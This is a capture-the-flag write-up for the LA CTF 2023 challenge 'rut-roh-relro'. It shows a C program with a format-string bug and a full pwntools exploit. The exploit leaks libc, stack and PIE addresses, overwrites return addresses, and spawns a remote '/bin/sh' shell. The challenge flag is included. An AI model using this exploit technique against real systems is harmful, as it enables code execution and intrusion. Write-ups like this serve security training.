La CTF 2023 - rut-roh-relro (RELRO)

WriteUpLa

My friend keeps writing super insecure C programs but I’m too lazy to fix his code. I’m sure it’ll be fine as long as I use enough exploit mitigations, right?
nc lac.tf 31180

  • [70 solves / 462 points]

Analysis

1
2
3
4
5
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      PIE enabled

Full Relro!! NX and PIE are enabled.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#include <stdio.h>

int main(void) {
    setbuf(stdout, NULL);
    puts("What would you like to post?");
    char buf[512];
    fgets(buf, 512, stdin);
    printf("Here's your latest post:\n");
    printf(buf);
    printf("\nWhat would you like to post?\n");
    fgets(buf, 512, stdin);
    printf(buf);
    printf("\nYour free trial has expired. Bye!\n");
    return 0;
}

You can find twice fsb.

Solve

  1. leak libc, stack, pie / ret2main (Overwrite the ret in stack to main)
  2. Overwrite the ret in stack to system / Overwrite the rdi to ‘/bin/sh\x00’

The rdi is in the writeable space. You know the libc address. Got the offset during debugging and overwrite it.

Exploit Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *

context.arch = 'amd64'
# context.log_level = 'DEBUG'

# p = process('./rut_roh_relro')
p = remote('lac.tf', 31134)
e = ELF('./rut_roh_relro')
libc = ELF('./libc.so.6')

# libc,stack,pie
payload = b''
payload += b'%71$p%68$p%63$p'

pause()
p.sendlineafter('?\n', payload)

p.recvuntil('0x')
libc.address = int(p.recv(12), 16) - 0x23d0a
info('libc address ' + hex(libc.address))

p.recvuntil('0x')
stack = int(p.recv(12), 16)
info('stack ' + hex(stack))
ret = stack - 0xe8

p.recvuntil('0x')
e.address = int(p.recv(12), 16) - 0x1265
info('pie address ' + hex(e.address))

# og = [0xc961a, 0xc961d, 0xc9620]

payload = b''
payload += fmtstr_payload(6, {ret : e.symbols['main']})
# pause()
p.sendlineafter('?\n', payload)

###### (2) ######
ret = stack - 0xe0
rdi = libc.address + 0x1d1990
info(hex(ret))

payload = b''
payload += fmtstr_payload(6, {ret : libc.symbols['system']})
payload += b'\x00\x00'

# pause()
p.sendlineafter('?\n', payload)

payload = b''
payload += fmtstr_payload(6, {rdi : b'/bin/sh\x00'})
payload += b'\x00\x00'

p.sendlineafter('?\n', payload)

p.interactive()

I want to use the one gadget, but I can’t. :( I have no choice to do honestly. Run the system('/bin/sh\x00') :).

But Some people use that gadget.. good.

Flag

1
lactf{maybe_ill_add_asan_for_good_measure}